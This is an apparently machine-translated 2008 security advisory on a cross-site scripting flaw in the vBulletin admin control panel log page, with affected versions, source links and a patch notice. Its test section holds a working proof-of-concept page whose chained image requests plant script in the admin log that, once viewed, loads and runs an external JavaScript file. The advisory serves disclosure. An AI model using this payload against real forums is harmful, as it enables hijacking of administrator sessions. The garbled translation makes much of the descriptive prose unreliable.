Issues the date: 2008-07-08
Renewal date: 2008-07-09
Is affected the system:
VBulletin VBulletin 3.7.2
VBulletin VBulletin 3.6.10 PL2
Not affected system:
VBulletin VBulletin 3.7.2 PL1
VBulletin VBulletin 3.6.10 PL3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30134
vBulletin is a section of open source code PHP forum procedure.
the vBulletin supervisory control kneading board's diary examined that the page has the cross station script crack. If the user requested when flaw page, will be managing the region foundation diary, but will not have the filtration to inspect this diary the input. The script name is obtains from basename(PHP_SELF), the operation is ['do'] obtains from _REQUEST, these two ways possibly cause the cross station script attack.
<* origin: Jessica Hope (jessicasaulhope@googlemail.com)
Link: http://secunia.com/advisories/30991/
http://www.vbulletin.com/forum/showthread.php?t=277945
http://marc.info/?l=bugtraq&m=121553726712934&w=2
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!
<html>
<body>
<img src= " http://localhost/vB/upload/admincp/faq.php/0?do= <script>/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22 <script'/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/* "/>
<! --edit to match your data -->
<img src= " http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js ></scrip'/* "/>
<! -- end edit -->
<img src= " http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't >%22) '/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/a0?do=*/ </script> "/>
</body>
</html>
Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:
VBulletin
---------
At present the manufacturer had already issued the promotion patch repairs this security problem, welcome to manufacturer main page downloading
|